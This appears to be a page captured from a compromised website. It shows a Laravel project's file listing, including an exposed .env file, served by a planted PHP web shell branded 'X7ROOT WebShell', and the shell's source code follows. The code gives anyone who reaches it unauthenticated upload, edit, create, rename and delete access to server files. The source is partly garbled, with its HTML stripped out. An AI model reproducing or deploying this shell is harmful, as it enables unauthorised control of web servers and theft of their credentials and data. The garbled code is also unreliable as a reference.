I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file size edit permission action
.editorconfig276 KBMarch 05 2024 07:12:340666
.env1385 KBMay 24 2024 16:43:550666
.env.example1088 KBMarch 05 2024 07:12:340666
.gitattributes190 KBMarch 05 2024 07:12:340666
.gitignore245 KBMarch 05 2024 07:12:340666
.htaccess947 KBJuly 04 2023 21:25:080664
.rnd1024 KBMarch 13 2024 04:51:140666
README.md472 KBMarch 22 2024 10:35:000666
app-March 05 2024 07:12:340777
artisan1739 KBMarch 05 2024 07:12:340666
bootstrap-March 05 2024 07:12:340777
composer.json2829 KBMay 13 2024 12:10:040666
composer.lock417205 KBMarch 19 2024 12:13:140666
config-July 03 2025 02:53:360777
database-March 05 2024 07:12:340777
index.php1816 KBMay 13 2024 10:32:360666
lang-May 13 2024 14:53:260777
manifest.json913 KBMay 14 2024 03:57:260664
package.json398 KBMarch 05 2024 07:12:340666
phpunit.xml1206 KBMarch 05 2024 07:12:340666
public-July 03 2025 02:37:200777
resources-May 13 2024 12:09:360777
routes-March 05 2024 07:12:340777
service-worker.js924 KBMarch 05 2024 07:12:340666
storage-March 05 2024 10:03:520777
symlink.php218 KBMarch 05 2024 07:12:340666
tests-March 05 2024 07:12:340777
vendor-March 19 2024 12:13:140777
vite.config.js326 KBMarch 05 2024 07:12:340666
489495df489495df" . basename($dest) . ""; $msgType = 'success'; } else { $message = '[!] Upload failed.'; $msgType = 'error'; } } // —— EDIT SAVE —— if (isset($_POST['save'], $_POST['file'], $_POST['content'])) { file_put_contents($_POST['file'], $_POST['content']); $message = '[+] File saved successfully.'; $msgType = 'success'; } // —— DELETE —— if (isset($_GET['delete'])) { $target = realpath($_GET['delete']); if (is_dir($target) ? rmdir($target) : unlink($target)) { $message = '[+] Deleted successfully.'; $msgType = 'success'; } else { $message = '[!] Delete failed.'; $msgType = 'error'; } } // —— RENAME FORM —— if (isset($_GET['rename'])) { $old = realpath($_GET['rename']); $base = basename($old); echo << Rename

Rename "{$base}"


HTML; exit; } // —— RENAME ACTION —— if (isset($_POST['dorename'], $_POST['file'], $_POST['newname'])) { $old = realpath($_POST['file']); $new = dirname($old) . DIRECTORY_SEPARATOR . basename($_POST['newname']); if (rename($old, $new)) { $message = '[+] Renamed to ' . basename($new); $msgType = 'success'; } else { $message = '[!] Rename failed.'; $msgType = 'error'; } } // —— CREATE FILE —— if (isset($_POST['create'], $_POST['newfile'])) { $newpath = $cwd . DIRECTORY_SEPARATOR . basename($_POST['newfile']); if (file_put_contents($newpath, $_POST['newcontent'])) { $message = '[+] Created: ' . basename($newpath); $msgType = 'success'; } else { $message = '[!] Create failed.'; $msgType = 'error'; } } // ASCII banner $banner = << ██╗ ██╗███████╗██████╗ ██████╗ ██████╗ ████████╗ ╚██╗██╔╝╚════██║██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝ ╚███╔╝ ██╔╝██████╔╝██║ ██║██║ ██║ ██║ ██╔██╗ ██╔╝ ██╔══██╗██║ ██║██║ ██║ ██║ ██╔╝ ██╗ ██║ ██║ ██║╚██████╔╝╚██████╔╝ ██║ HTML; // OUTPUT PAGE echo << X7ROOT WebShell
$banner
$message
Path: HTML; // Breadcrumb $parts = explode(DIRECTORY_SEPARATOR, $cwd); $acc = ''; foreach ($parts as $i => $part) { if ($part === '') { $acc = DIRECTORY_SEPARATOR; echo "/"; continue; } $acc .= DIRECTORY_SEPARATOR . $part; echo "" . htmlentities($part) . ""; if ($i < count($parts) - 1) echo " / "; } echo "Home"; echo <<

    HTML; // Separate directories and files $dirs = []; $files_only = []; foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $full = $cwd . DIRECTORY_SEPARATOR . $file; if (is_dir($full)) { $dirs[] = $file; } else { $files_only[] = $file; } } // Show directories foreach ($dirs as $file) { $full = $cwd . DIRECTORY_SEPARATOR . $file; $disp = htmlentities($file); $enc = urlencode($full); echo "
  • [DIR] {$disp} "; echo "[Rename] "; echo "[Delete]
    • "; } // Show files foreach ($files_only as $file) { $full = $cwd . DIRECTORY_SEPARATOR . $file; $disp = htmlentities($file); $enc = urlencode($full); echo "
  • [FILE] {$disp} "; echo "[Edit] "; echo "[Rename] "; echo "[Delete]
    • "; } echo << HTML; // Edit form if (isset($_GET['edit'])) { $file = $_GET['edit']; $content = htmlspecialchars(file_get_contents($file)); echo <<
    FORM; } echo <<
HTML;